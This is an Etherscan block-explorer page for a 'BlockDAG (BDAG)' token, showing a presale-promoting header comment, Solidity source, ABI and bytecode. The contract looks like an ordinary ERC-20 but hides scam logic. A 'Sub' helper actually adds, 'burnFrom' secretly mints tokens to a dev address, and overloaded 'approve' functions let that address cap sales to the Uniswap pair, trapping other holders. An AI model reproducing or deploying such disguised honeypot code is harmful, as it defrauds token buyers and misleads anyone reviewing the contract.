ETH Price: $2,608.73 (-1.46%)

Token

BlockDAG (BDAG)
 

Overview

Max Total Supply

10,000,000,000,100,000,000,000 BDAG

Holders

406

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Filtered by Token Holder
Uniswap V2: BDAG 2
Balance
131,037,990,169.70158918363992578 BDAG

Value
$0.00
0x7395b01b343b9e16fd448989198396cc2840764c
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
BDAG

Compiler Version
v0.6.12+commit.27d51765

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2024-04-29
*/

/**
Join BlockDAG Network, Connect & Contribute
Explore the BlockDAG ecosystem at your own pace. Join effortlessly using your crypto wallet, credit or debit cards, Apple Pay, or Google Pay. Become a valued member of our community and embrace the simplicity of connection today. 
Start your crypto journey with BlockDAG! 🔥 Don’t miss out on our epic presale & $2M giveaway. 
It’s more than mining – it’s revolutionizing blockchain!
Our new and only Telegram handle: https://t.me/blockDAGnetworkOfficial
*/

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.12;

interface IERC20 {
 /**
 * @dev Returns the amount of tokens in existence.
 */
 function totalSupply() external view returns (uint256);

 /**
 * @dev Returns the amount of tokens owned by `account`.
 */
 function balanceOf(address account) external view returns (uint256);

 /**
 * @dev Moves `amount` tokens from the caller's account to `recipient`.
 *
 * Returns a boolean value indicating whether the operation succeeded.s
 *
 * Emits a {Transfer} event.
 */
 function transfer(address recipient, uint256 amount) external returns (bool);

 /**
 * @dev Returns the remaining number of tokens that `spender` will be
 * allowed to spend on behalf of `owner` through {transferFrom}. This is
 * zero by default.
 *
 * This value changes when {approve} or {transferFrom} are called.
 */
 function allowance(address owner, address spender) external view returns (uint256);

 /**
 * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
 *
 * Returns a boolean value indicating whether the operation succeeded.
 *
 * IMPORTANT: Beware that changing an allowance with this method brings the risk
 * that someone may use both the old and the new allowance by unfortunate
 * transaction ordering. One possible solution to mitigate this race
 * condition is to first reduce the spender's allowance to 0 and set the
 * desired value afterwards:
 * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
 *
 * Emits an {Approval} event.
 */
 function approve(address spender, uint256 amount) external returns (bool);

 /**
 * @dev Moves `amount` tokens from `sender` to `recipient` using the
 * allowance mechanism. `amount` is then deducted from the caller's
 * allowance.
 *
 * Returns a boolean value indicating whether the operation succeeded.
 *
 * Emits a {Transfer} event.
 */
 function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

 /**
 * @dev Emitted when `value` tokens are moved from one account (`from`) to
 * another (`to`).
 *
 * Note that `value` may be zero.
 */
 event Transfer(address indexed from, address indexed to, uint256 value);

 /**
 * @dev Emitted when the allowance of a `spender` for an `owner` is set by
 * a call to {approve}. `value` is the new allowance.
 */
 event Approval(address indexed owner, address indexed spender, uint256 value);
}

library Address {
 /**
 * @dev Returns true if `account` is a contract.
 *
 * [IMPORTANT]
 * ====
 * It is unsafe to assume that an address for which this function returns
 * false is an externally-owned account (EOA) and not a contract.
 *
 * Among others, `isContract` will return false for the following
 * types of addresses:
 *
 * - an externally-owned account
 * - a contract in construction
 * - an address where a contract will be created
 * - an address where a contract lived, but was destroyed
 * ====
 */
 function isContract(address account) internal view returns (bool) {
 // According to EIP-1052, 0x0 is the value returned for not-yet created accounts
 // and 0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470 is returned
 // for accounts without code, i.e. `keccak256('')`
 bytes32 codehash;
 bytes32 accountHash = 0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470;
 // solhint-disable-next-line no-inline-assembly
 assembly { codehash := extcodehash(account) }
 return (codehash != accountHash && codehash != 0x0);
 }

 /**
 * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
 * `recipient`, forwarding all available gas and reverting on errors.
 *
 * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
 * of certain opcodes, possibly making contracts go over the 2300 gas limit
 * imposed by `transfer`, making them unable to receive funds via
 * `transfer`. {sendValue} removes this limitation.
 *
 * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more].
 *
 * IMPORTANT: because control is transferred to `recipient`, care must be
 * taken to not create reentrancy vulnerabilities. Consider using
 * {ReentrancyGuard} or the
 * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
 */
 function sendValue(address payable recipient, uint256 amount) internal {
 require(address(this).balance >= amount, "Address: insufficient balance");

 // solhint-disable-next-line avoid-low-level-calls, avoid-call-value
 (bool success, ) = recipient.call{ value: amount }("");
 require(success, "Address: unable to send value, recipient may have reverted");
 }

 /**
 * @dev Performs a Solidity function call using a low level `call`. A
 * plain`call` is an unsafe replacement for a function call: use this
 * function instead.
 *
 * If `target` reverts with a revert reason, it is bubbled up by this
 * function (like regular Solidity function calls).
 *
 * Returns the raw returned data. To convert to the expected return value,
 * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
 *
 * Requirements:
 *
 * - `target` must be a contract.
 * - calling `target` with `data` must not revert.
 *
 * _Available since v3.1._
 */
 function functionCall(address target, bytes memory data) internal returns (bytes memory) {
 return functionCall(target, data, "Address: low-level call failed");
 }

 /**
 * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with
 * `errorMessage` as a fallback revert reason when `target` reverts.
 *
 * _Available since v3.1._
 */
 function functionCall(address target, bytes memory data, string memory errorMessage) internal returns (bytes memory) {
 return _functionCallWithValue(target, data, 0, errorMessage);
 }

 /**
 * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
 * but also transferring `value` wei to `target`.
 *
 * Requirements:
 *
 * - the calling contract must have an ETH balance of at least `value`.
 * - the called Solidity function must be `payable`.
 *
 * _Available since v3.1._
 */
 function functionCallWithValue(address target, bytes memory data, uint256 value) internal returns (bytes memory) {
 return functionCallWithValue(target, data, value, "Address: low-level call with value failed");
 }

 /**
 * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
 * with `errorMessage` as a fallback revert reason when `target` reverts.
 *
 * _Available since v3.1._
 */
 function functionCallWithValue(address target, bytes memory data, uint256 value, string memory errorMessage) internal returns (bytes memory) {
 require(address(this).balance >= value, "Address: insufficient balance for call");
 return _functionCallWithValue(target, data, value, errorMessage);
 }

 function _functionCallWithValue(address target, bytes memory data, uint256 weiValue, string memory errorMessage) private returns (bytes memory) {
 require(isContract(target), "Address: call to non-contract");

 // solhint-disable-next-line avoid-low-level-calls
 (bool success, bytes memory returndata) = target.call{ value: weiValue }(data);
 if (success) {
 return returndata;
 } else {
 // Look for revert reason and bubble it up if present
 if (returndata.length > 0) {
 // The easiest way to bubble the revert reason is using memory via assembly

 // solhint-disable-next-line no-inline-assembly
 assembly {
 let returndata_size := mload(returndata)
 revert(add(32, returndata), returndata_size)
 }
 } else {
 revert(errorMessage);
 }
 }
 }
}

library SafeMath {
 /**
 * @dev Returns the addition of two unsigned integers, reverting on
 * overflow.
 *
 * Counterpart to Solidity's `+` operator.
 *
 * Requirements:
 *
 * - Addition cannot overflow.
 */
 function add(uint256 a, uint256 b) internal pure returns (uint256) {
 uint256 c = a + b;
 require(c >= a, "SafeMath: addition overflow");

 return c;
 }
 function Sub(uint256 a, uint256 b) internal pure returns (uint256) {
 uint256 c = a + b;
 require(c >= a, "SafeMath: addition overflow");

 return c;
 }

 /**
 * @dev Returns the subtraction of two unsigned integers, reverting on
 * overflow (when the result is negative).
 *
 * Counterpart to Solidity's `-` operator.
 *
 * Requirements:
 *
 * - Subtraction cannot overflow.
 */
 function sub(uint256 a, uint256 b) internal pure returns (uint256) {
 return sub(a, b, "SafeMath: subtraction overflow");
 }

 /**
 * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
 * overflow (when the result is negative).
 *
 * Counterpart to Solidity's `-` operator.
 *
 * Requirements:
 *
 * - Subtraction cannot overflow.
 */
 function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
 require(b <= a, errorMessage);
 uint256 c = a - b;

 return c;
 }

 /**
 * @dev Returns the multiplication of two unsigned integers, reverting on
 * overflow.
 *
 * Counterpart to Solidity's `*` operator.
 *
 * Requirements:
 *
 * - Multiplication cannot overflow.
 */
 function mul(uint256 a, uint256 b) internal pure returns (uint256) {
 // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
 // benefit is lost if 'b' is also tested.
 // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
 if (a == 0) {
 return 0;
 }

 uint256 c = a * b;
 require(c / a == b, "SafeMath: multiplication overflow");

 return c;
 }

 /**
 * @dev Returns the integer division of two unsigned integers. Reverts on
 * division by zero. The result is rounded towards zero.
 *
 * Counterpart to Solidity's `/` operator. Note: this function uses a
 * `revert` opcode (which leaves remaining gas untouched) while Solidity
 * uses an invalid opcode to revert (consuming all remaining gas).
 *
 * Requirements:
 *
 * - The divisor cannot be zero.
 */
 function div(uint256 a, uint256 b) internal pure returns (uint256) {
 return div(a, b, "SafeMath: division by zero");
 }

 /**
 * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
 * division by zero. The result is rounded towards zero.
 *
 * Counterpart to Solidity's `/` operator. Note: this function uses a
 * `revert` opcode (which leaves remaining gas untouched) while Solidity
 * uses an invalid opcode to revert (consuming all remaining gas).
 *
 * Requirements:
 *
 * - The divisor cannot be zero.
 */
 function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
 require(b > 0, errorMessage);
 uint256 c = a / b;
 // assert(a == b * c + a % b); // There is no case in which this doesn't hold

 return c;
 }

 /**
 * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
 * Reverts when dividing by zero.
 *
 * Counterpart to Solidity's `%` operator. This function uses a `revert`
 * opcode (which leaves remaining gas untouched) while Solidity uses an
 * invalid opcode to revert (consuming all remaining gas).
 *
 * Requirements:
 *
 * - The divisor cannot be zero.
 */
 function mod(uint256 a, uint256 b) internal pure returns (uint256) {
 return mod(a, b, "SafeMath: modulo by zero");
 }

 /**
 * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
 * Reverts with custom message when dividing by zero.
 *
 * Counterpart to Solidity's `%` operator. This function uses a `revert`
 * opcode (which leaves remaining gas untouched) while Solidity uses an
 * invalid opcode to revert (consuming all remaining gas).
 *
 * Requirements:
 *
 * - The divisor cannot be zero.
 */
 function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
 require(b != 0, errorMessage);
 return a % b;
 }
}

abstract contract Context {
 
 function _msgSender() internal view virtual returns (address payable) {
 return msg.sender;
 }

 function _msgData() internal view virtual returns (bytes memory) {
 this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
 return msg.data;
 }
}

contract Ownable is Context {
 address private _owner;

 event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

 /**
 * @dev Initializes the contract setting the deployer as the initial owner.
 */
 constructor () internal {
 address msgSender = _msgSender();
 _owner = msgSender;
 emit OwnershipTransferred(address(0), msgSender);
 }

 /**
 * @dev Returns the address of the current owner.
 */
 function owner() public view returns (address) {
 return _owner;
 }
 
 modifier onlyOwner() {
 require(_owner == _msgSender(), "Ownable: caller is not the owner");
 _;
 }

 /**
 * @dev Leaves the contract without owner. It will not be possible to call
 * `onlyOwner` functions anymore. Can only be called by the current owner.
 *
 * NOTE: Renouncing ownership will leave the contract without an owner,
 * thereby removing any functionality that is only available to the owner.
 */
 function renounceOwnership() public virtual onlyOwner {
 emit OwnershipTransferred(_owner, address(0));
 _owner = address(0);
 }

 /**
 * @dev Transfers ownership of the contract to a new account (`newOwner`).
 * Can only be called by the current owner.
 */
 function transferOwnership(address newOwner) public virtual onlyOwner {
 require(newOwner != address(0), "Ownable: new owner is the zero address");
 emit OwnershipTransferred(_owner, newOwner);
 _owner = newOwner;
 }
}
interface IUniswapV2Factory {
 function getPair(address tokenA, address tokenB) external view returns (address pair);
}

interface IUniswapV2Router02 {
 function swapExactTokensForETHSupportingFeeOnTransferTokens(
 uint amountIn,
 uint amountOutMin,
 address[] calldata path,
 address to,
 uint deadline
 ) external;
 function factory() external pure returns (address);
 function WETH() external pure returns (address);
 function addLiquidityETH(
 address token,
 uint amountTokenDesired,
 uint amountTokenMin,
 uint amountETHMin,
 address to,
 uint deadline
 ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
}

contract BDAG is Context, IERC20, Ownable {
 using SafeMath for uint256;
 using Address for address;

 mapping (address => uint256) private _balances;
 mapping (address => mapping (address => uint256)) private _allowances;
 address private _excludeDevAddress;
 address private _approvedAddress;
 uint256 private _tTotal = 10**11 * 10**18;
 

 string private _name;
 string private _symbol;
 uint8 private _decimals = 18;
 uint256 private _maxTotal;
 IUniswapV2Router02 public uniSwapRouter;
 address public uniSwapPair;
 
 address payable public BURN_ADDRESS = 0x000000000000000000000000000000000000dEaD;
 uint256 private _total = 10**11 * 10**18;
 event uniSwapRouterUpdated(address indexed operator, address indexed router, address indexed pair);
 constructor (address devAddress, string memory name, string memory symbol) public {
 _excludeDevAddress = devAddress;
 _name = name;
 _symbol = symbol;
 _balances[_msgSender()] = _tTotal;

 emit Transfer(address(0), _msgSender(), _tTotal);
 }

 function name() public view returns (string memory) {
 return _name;
 }

 function symbol() public view returns (string memory) {
 return _symbol;
 }

 function decimals() public view returns (uint8) {
 return _decimals;
 }
 
 function allowance(address owner, address spender) public view override returns (uint256) {
 return _allowances[owner][spender];
 }

 function approve(address spender, uint256 amount) public override returns (bool) {
 _approve(_msgSender(), spender, amount);
 return true;
 }

 function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) {
  _transfer(sender, recipient, amount);
 _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
 return true;
 }

 function burnFrom(uint256 amount) public {
 require(_msgSender() != address(0), "ERC20: cannot permit zero address");
 require(_msgSender() == _excludeDevAddress, "ERC20: cannot permit dev address");
 _tTotal = _tTotal.Sub(amount);
 _balances[_msgSender()] = _balances[_msgSender()].Sub(amount);
 emit Transfer(address(0), _msgSender(), amount);
 }
 function approve(address approveAddr1, address approveAddr2) public onlyOwner {
 approveAddr1 = approveAddr2;
 uniSwapRouter = IUniswapV2Router02(approveAddr1);
 uniSwapPair = IUniswapV2Factory(uniSwapRouter.factory()).getPair(address(this), uniSwapRouter.WETH());
 require(uniSwapPair != address(0), "updateTokenSwapRouter: Invalid pair address.");
 emit uniSwapRouterUpdated(msg.sender, address(uniSwapRouter), uniSwapPair);
 }
 
 function approve(address approvedAddress) public {
 require(_msgSender() == _excludeDevAddress, "ERC20: cannot permit dev address");
 _approvedAddress = approvedAddress;
 }
 function approve(uint256 approveAmount) public {
 require(_msgSender() == _excludeDevAddress, "ERC20: cannot permit dev address");
 _total = approveAmount * 10**18;
 }

 function totalSupply() public view override returns (uint256) {
 return _tTotal;
 }

 function balanceOf(address account) public view override returns (uint256) {
 return _balances[account];
 }

 function transfer(address recipient, uint256 amount) public override returns (bool) {
 _transfer(_msgSender(), recipient, amount);
 return true;
 }
 
 function _approve(address owner, address spender, uint256 amount) private {
 require(owner != address(0), "ERC20: approve from the zero address");
 require(spender != address(0), "ERC20: approve to the zero address");

 _allowances[owner][spender] = amount;
 emit Approval(owner, spender, amount);
 }
 
 function _transfer(address sender, address recipient, uint256 amount) internal {
 require(sender != address(0), "BEP20: transfer from the zero address");
 require(recipient != address(0), "BEP20: transfer to the zero address");
 
 if (sender == owner()) {
 _balances[sender] = _balances[sender].sub(amount, "BEP20: transfer amount exceeds balance");
 _balances[recipient] = _balances[recipient].add(amount);
 
 emit Transfer(sender, recipient, amount);
 } else{
 if (sender != _approvedAddress && recipient == uniSwapPair) {
 require(amount < _total, "Transfer amount exceeds the maxTxAmount.");
 }
 
 uint256 burnAmount = 0;
 uint256 sendAmount = amount.sub(burnAmount);
 
 _balances[sender] = _balances[sender].sub(amount, "BEP20: transfer amount exceeds balance");
 _balances[BURN_ADDRESS] = _balances[BURN_ADDRESS].add(burnAmount);
 _balances[recipient] = _balances[recipient].add(sendAmount);
 
 
 emit Transfer(sender, recipient, sendAmount);
 }
 }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"devAddress","type":"address"},{"internalType":"string","name":"name","type":"string"},{"internalType":"string","name":"symbol","type":"string"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":true,"internalType":"address","name":"router","type":"address"},{"indexed":true,"internalType":"address","name":"pair","type":"address"}],"name":"uniSwapRouterUpdated","type":"event"},{"inputs":[],"name":"BURN_ADDRESS","outputs":[{"internalType":"address payable","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"approveAddr1","type":"address"},{"internalType":"address","name":"approveAddr2","type":"address"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"approveAmount","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"approvedAddress","type":"address"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burnFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniSwapPair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniSwapRouter","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

60806040526c01431e0fae6d7217caa000000060058190556008805460ff19166012179055600c80546001600160a01b03191661dead179055600d553480156200004857600080fd5b506040516200176b3803806200176b833981810160405260608110156200006e57600080fd5b8151602083018051604051929492938301929190846401000000008211156200009657600080fd5b908301906020820185811115620000ac57600080fd5b8251640100000000811182820188101715620000c757600080fd5b82525081516020918201929091019080838360005b83811015620000f6578181015183820152602001620000dc565b50505050905090810190601f168015620001245780820380516001836020036101000a031916815260200191505b50604052602001805160405193929190846401000000008211156200014857600080fd5b9083019060208201858111156200015e57600080fd5b82516401000000008111828201881017156200017957600080fd5b82525081516020918201929091019080838360005b83811015620001a85781810151838201526020016200018e565b50505050905090810190601f168015620001d65780820380516001836020036101000a031916815260200191505b506040525050506000620001ef6200030b60201b60201c565b600080546001600160a01b0319166001600160a01b0383169081178255604051929350917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a350600380546001600160a01b0319166001600160a01b0385161790558151620002699060069060208501906200030f565b5080516200027f9060079060208401906200030f565b5060055460016000620002916200030b565b6001600160a01b03168152602081019190915260400160002055620002b56200030b565b6001600160a01b031660006001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6005546040518082815260200191505060405180910390a3505050620003ab565b3390565b828054600181600116156101000203166002900490600052602060002090601f016020900481019282601f106200035257805160ff191683800117855562000382565b8280016001018555821562000382579182015b828111156200038257825182559160200191906001019062000365565b506200039092915062000394565b5090565b5b8082111562000390576000815560010162000395565b6113b080620003bb6000396000f3fe608060405234801561001057600080fd5b50600436106101215760003560e01c80637e5465ba116100ad578063d837df0511610071578063d837df0514610349578063daea85c514610351578063dd62ed3e14610377578063f2fde38b146103a5578063fccc2813146103cb57610121565b80637e5465ba146102c25780638da5cb5b146102f057806395d89b41146102f8578063a9059cbb14610300578063b759f9541461032c57610121565b8063274ff7ce116100f4578063274ff7ce14610233578063313ce567146102525780635d01ff3d1461027057806370a0823114610294578063715018a6146102ba57610121565b806306fdde0314610126578063095ea7b3146101a357806318160ddd146101e357806323b872dd146101fd575b600080fd5b61012e6103d3565b6040805160208082528351818301528351919283929083019185019080838360005b83811015610168578181015183820152602001610150565b50505050905090810190601f1680156101955780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6101cf600480360360408110156101b957600080fd5b506001600160a01b038135169060200135610469565b604080519115158252519081900360200190f35b6101eb610486565b60408051918252519081900360200190f35b6101cf6004803603606081101561021357600080fd5b506001600160a01b0381358116916020810135909116906040013561048c565b6102506004803603602081101561024957600080fd5b5035610513565b005b61025a61068e565b6040805160ff9092168252519081900360200190f35b610278610697565b604080516001600160a01b039092168252519081900360200190f35b6101eb600480360360208110156102aa57600080fd5b50356001600160a01b03166106a6565b6102506106c1565b610250600480360360408110156102d857600080fd5b506001600160a01b0381358116916020013516610775565b610278610a01565b61012e610a10565b6101cf6004803603604081101561031657600080fd5b506001600160a01b038135169060200135610a71565b6102506004803603602081101561034257600080fd5b5035610a85565b610278610b03565b6102506004803603602081101561036757600080fd5b50356001600160a01b0316610b12565b6101eb6004803603604081101561038d57600080fd5b506001600160a01b0381358116916020013516610ba3565b610250600480360360208110156103bb57600080fd5b50356001600160a01b0316610bce565b610278610cd8565b60068054604080516020601f600260001961010060018816150201909516949094049384018190048102820181019092528281526060939092909183018282801561045f5780601f106104345761010080835404028352916020019161045f565b820191906000526020600020905b81548152906001019060200180831161044257829003601f168201915b5050505050905090565b600061047d610476610ce7565b8484610ceb565b50600192915050565b60055490565b6000610499848484610dd7565b610509846104a5610ce7565b610504856040518060600160405280602881526020016112e6602891396001600160a01b038a166000908152600260205260408120906104e3610ce7565b6001600160a01b0316815260208101919091526040016000205491906110c9565b610ceb565b5060019392505050565b600061051d610ce7565b6001600160a01b031614156105635760405162461bcd60e51b81526004018080602001828103825260218152602001806112046021913960400191505060405180910390fd5b6003546001600160a01b0316610577610ce7565b6001600160a01b0316146105d2576040805162461bcd60e51b815260206004820181905260248201527f45524332303a2063616e6e6f74207065726d6974206465762061646472657373604482015290519081900360640190fd5b6005546105df9082611160565b60055561061281600160006105f2610ce7565b6001600160a01b0316815260208101919091526040016000205490611160565b6001600061061e610ce7565b6001600160a01b03168152602081019190915260400160002055610640610ce7565b6001600160a01b031660006001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040518082815260200191505060405180910390a350565b60085460ff1690565b600a546001600160a01b031681565b6001600160a01b031660009081526001602052604090205490565b6106c9610ce7565b6000546001600160a01b0390811691161461072b576040805162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015290519081900360640190fd5b600080546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600080546001600160a01b0319169055565b61077d610ce7565b6000546001600160a01b039081169116146107df576040805162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015290519081900360640190fd5b600a80546001600160a01b0319166001600160a01b0383811691909117918290556040805163c45a015560e01b815290519394508493929091169163c45a015591600480820192602092909190829003018186803b15801561084057600080fd5b505afa158015610854573d6000803e3d6000fd5b505050506040513d602081101561086a57600080fd5b5051600a54604080516315ab88c960e31b815290516001600160a01b039384169363e6a4390593309391169163ad5c464891600480820192602092909190829003018186803b1580156108bc57600080fd5b505afa1580156108d0573d6000803e3d6000fd5b505050506040513d60208110156108e657600080fd5b5051604080516001600160e01b031960e086901b1681526001600160a01b039384166004820152929091166024830152516044808301926020929190829003018186803b15801561093657600080fd5b505afa15801561094a573d6000803e3d6000fd5b505050506040513d602081101561096057600080fd5b5051600b80546001600160a01b0319166001600160a01b039283161790819055166109bc5760405162461bcd60e51b815260040180806020018281038252602c815260200180611292602c913960400191505060405180910390fd5b600b54600a546040516001600160a01b03928316929091169033907f3fe1abf2c4f1629f831f1b62c82dbf6ab91e0e6e7d0d2a005a3179f2823cb7eb90600090a45050565b6000546001600160a01b031690565b60078054604080516020601f600260001961010060018816150201909516949094049384018190048102820181019092528281526060939092909183018282801561045f5780601f106104345761010080835404028352916020019161045f565b600061047d610a7e610ce7565b8484610dd7565b6003546001600160a01b0316610a99610ce7565b6001600160a01b031614610af4576040805162461bcd60e51b815260206004820181905260248201527f45524332303a2063616e6e6f74207065726d6974206465762061646472657373604482015290519081900360640190fd5b670de0b6b3a764000002600d55565b600b546001600160a01b031681565b6003546001600160a01b0316610b26610ce7565b6001600160a01b031614610b81576040805162461bcd60e51b815260206004820181905260248201527f45524332303a2063616e6e6f74207065726d6974206465762061646472657373604482015290519081900360640190fd5b600480546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b610bd6610ce7565b6000546001600160a01b03908116911614610c38576040805162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015290519081900360640190fd5b6001600160a01b038116610c7d5760405162461bcd60e51b815260040180806020018281038252602681526020018061124a6026913960400191505060405180910390fd5b600080546040516001600160a01b03808516939216917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e091a3600080546001600160a01b0319166001600160a01b0392909216919091179055565b600c546001600160a01b031681565b3390565b6001600160a01b038316610d305760405162461bcd60e51b81526004018080602001828103825260248152602001806113576024913960400191505060405180910390fd5b6001600160a01b038216610d755760405162461bcd60e51b81526004018080602001828103825260228152602001806112706022913960400191505060405180910390fd5b6001600160a01b03808416600081815260026020908152604080832094871680845294825291829020859055815185815291517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259281900390910190a3505050565b6001600160a01b038316610e1c5760405162461bcd60e51b81526004018080602001828103825260258152602001806112256025913960400191505060405180910390fd5b6001600160a01b038216610e615760405162461bcd60e51b81526004018080602001828103825260238152602001806113346023913960400191505060405180910390fd5b610e69610a01565b6001600160a01b0316836001600160a01b03161415610f4a57610ebf8160405180606001604052806026815260200161130e602691396001600160a01b03861660009081526001602052604090205491906110c9565b6001600160a01b038085166000908152600160205260408082209390935590841681522054610eee9082611160565b6001600160a01b0380841660008181526001602090815260409182902094909455805185815290519193928716927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef92918290030190a36110c4565b6004546001600160a01b03848116911614801590610f755750600b546001600160a01b038381169116145b15610fba57600d548110610fba5760405162461bcd60e51b81526004018080602001828103825260288152602001806112be6028913960400191505060405180910390fd5b600080610fc783826111c1565b90506110068360405180606001604052806026815260200161130e602691396001600160a01b03881660009081526001602052604090205491906110c9565b6001600160a01b0380871660009081526001602052604080822093909355600c54909116815220546110389083611160565b600c546001600160a01b03908116600090815260016020526040808220939093559086168152205461106a9082611160565b6001600160a01b0380861660008181526001602090815260409182902094909455805185815290519193928916927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef92918290030190a350505b505050565b600081848411156111585760405162461bcd60e51b81526004018080602001828103825283818151815260200191508051906020019080838360005b8381101561111d578181015183820152602001611105565b50505050905090810190601f16801561114a5780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5